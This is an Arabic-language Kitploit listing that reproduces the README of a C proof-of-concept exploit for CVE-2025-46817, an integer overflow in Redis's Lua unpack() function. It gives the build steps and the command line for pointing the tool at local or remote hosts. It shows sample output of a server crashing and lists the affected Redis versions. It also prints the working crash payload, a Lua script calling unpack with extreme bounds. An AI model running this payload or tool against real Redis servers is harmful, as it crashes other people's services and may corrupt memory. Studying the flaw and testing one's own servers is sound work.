Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
أدوات/GitHubGitHub/slayerkkkk/cve-2025-46817-poc
تحليل الثغرات الأمنيةالاستغلالالاختبار العشوائياختبار الاختراقأمن قواعد البيانات
GitHubslayerkkkk/cve-2025-46817-poc

CVE-2025-46817-PoC

استغلال مبني على لغة C لثغرة CVE-2025-46817، وهي ثغرة تجاوز عدد صحيح في Redis، تتيح اكتشاف الانهيار وإمكانية تنفيذ التعليمات البرمجية عن بُعد (RCE) عبر حمولة Lua unpack().

عرض المستودع
28منذ 10 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2025-46817 استغلال تجاوز عدد صحيح في Redis

Banner Language Platform

تنفيذ خفيف بلغة C لاستغلال CVE-2025-46817 لثغرة تجاوز عدد صحيح في Redis.

🚀 الميزات

  • خفيف: ملف C واحد، بدون تبعيات خارجية بخلاف hiredis
  • سريع: ترجمة أصلية لأقصى أداء
  • مخرجات ملونة: ألوان وأيقونات طرفية جميلة
  • كشف الانهيار: يكتشف تلقائيًا انهيار الخادم
  • فحص الإصدار: يحدد إصدارات Redis المعرضة للخطر
  • دعم المهلة الزمنية: مهلات اتصال قابلة للتكوين

📋 المتطلبات

Ubuntu/Debian

root@kitploit:~
sudo apt-get update
sudo apt-get install build-essential libhiredis-dev

CentOS/RHEL

root@kitploit:~
sudo yum install gcc hiredis-devel

macOS

root@kitploit:~
brew install hiredis

🔧 الترجمة

root@kitploit:~
gcc -o exploit exploit.c -lhiredis

🎯 الاستخدام

الاستخدام الأساسي

root@kitploit:~
./exploit -H 127.0.0.1 -P 6379

هدف بعيد

root@kitploit:~
./exploit -H 192.168.1.100 -P 6379 -t 5

خيارات سطر الأوامر

root@kitploit:~
-H <host>    مضيف خادم Redis (مطلوب)
-P <port>    منفذ خادم Redis (مطلوب)  
-t <timeout> مهلة الاتصال بالثواني (الافتراضي: 10)
-h           عرض رسالة المساعدة

📊 مثال على المخرجات

root@kitploit:~
 ██▓███   █     █░███▄    █  ▄▄▄▄    █    ██   █████▒ █████▒▓█████  ██▀███  
▓██░  ██▒▓█░ █ ░█░██ ▀█   █ ▓█████▄  ██  ▓██▒▓██   ▒▓██   ▒ ▓█   ▀ ▓██ ▒ ██▒
▓██░ ██▓▒▒█░ █ ░█▓██  ▀█ ██▒▒██▒ ▄██▓██  ▒██░▒████ ░▒████ ░ ▒███   ▓██ ░▄█ ▒
▒██▄█▓▒ ▒░█░ █ ░█▓██▒  ▐▌██▒▒██░█▀  ▓▓█  ░██░░▓█▒  ░░▓█▒  ░ ▒▓█  ▄ ▒██▀▀█▄  
▒██▒ ░  ░░░██▒██▓▒██░   ▓██░░▓█  ▀█▓▒▒█████▓ ░▒█░   ░▒█░    ░▒████▒░██▓ ▒██▒
▒▓▒░ ░  ░░ ▓░▒ ▒ ░ ▒░   ▒ ▒ ░▒▓███▀▒░▒▓▒ ▒ ▒  ▒ ░    ▒ ░    ░░ ▒░ ░░ ▒▓ ░▒▓░
░▒ ░       ▒ ░ ░ ░ ░░   ░ ▒░▒░▒   ░ ░░▒░ ░ ░  ░      ░       ░ ░  ░  ░▒ ░ ▒░
░░         ░   ░    ░   ░ ░  ░    ░  ░░░ ░ ░  ░ ░    ░ ░       ░     ░░   ░ 
             ░            ░  ░         ░                       ░  ░   ░     
                                  ░                                         
                    أداة استغلال CVE-2025-46817
                   تجاوز عدد صحيح -> سلسلة RCE
                   الوصول -> https://pwnbuffer.org/

    المؤلف: Slayerkkk
    الهدف: Redis <= 8.2.1
    النوع: تلف الذاكرة -> تنفيذ الكود

ℹ️ اختبار الاتصال بـ 127.0.0.1:6379...
✅ الاتصال ناجح
ℹ️ إصدار Redis: 8.2.1
❌ عرضة للخطر - الإصدار <= 8.2.1
ℹ️ اختبار سكربتات Lua...
✅ Lua مفعل (1+1=2)

🚀 بدء الاستغلال
==================================================
💀 تنفيذ حمولة الاستغلال...
    الحمولة: تجاوز عدد صحيح عبر unpack()
💥 انهيار الخادم - فقدان الاتصال!

📊 نتيجة الاستغلال
==============================
  💥 الحالة: انهار (2.34s)

💀 نجاح الاستغلال - انهار الخادم!
   تم تأكيد ثغرة CVE-2025-46817

🛡️ الإصدارات المتأثرة

  • Redis <= 8.2.1
  • Redis <= 8.0.3
  • Redis <= 7.4.5
  • Redis <= 7.2.10
  • Redis <= 6.2.19

🔍 التفاصيل التقنية

الثغرة

يستهدف الاستغلال تجاوز عدد صحيح في تنفيذ دالة unpack() الخاصة بـ Lua في Redis (luaB_unpack). عند استدعائها بمعاملات محددة، يفيض الحساب الحسابي للأعداد الصحيحة الموقعة، مما يدفع Redis لمحاولة إنشاء عدد هائل من قيم الإرجاع.

حمولة الاستغلال

root@kitploit:~
local data = {1, 2, 3}
return {unpack(data, -2147483648, 2147483647)}

التأثير

  • انهيار الخادم: رفض خدمة فوري
  • تلف الذاكرة: تلف الكومة/المكدس
  • RCE محتمل: قد يؤدي تلف الذاكرة إلى تنفيذ الكود

🎯 نتائج الكشف

تبلغ الأداة عن إحدى هذه الحالات:

  • ✅ نجا: تعامل الخادم مع الحمولة (على الأرجح تم تصحيحه)
  • 💥 انهار: انهار الخادم (عرضة للخطر)
  • ⚠️ مهلة: علق الخادم (على الأرجح عرضة للخطر)
  • ❌ خطأ: حدث خطأ آخر

🙏 الاعتمادات

المؤلف: Slayerkkk
الموقع: https://pwnbuffer.org

تنزيل الأداة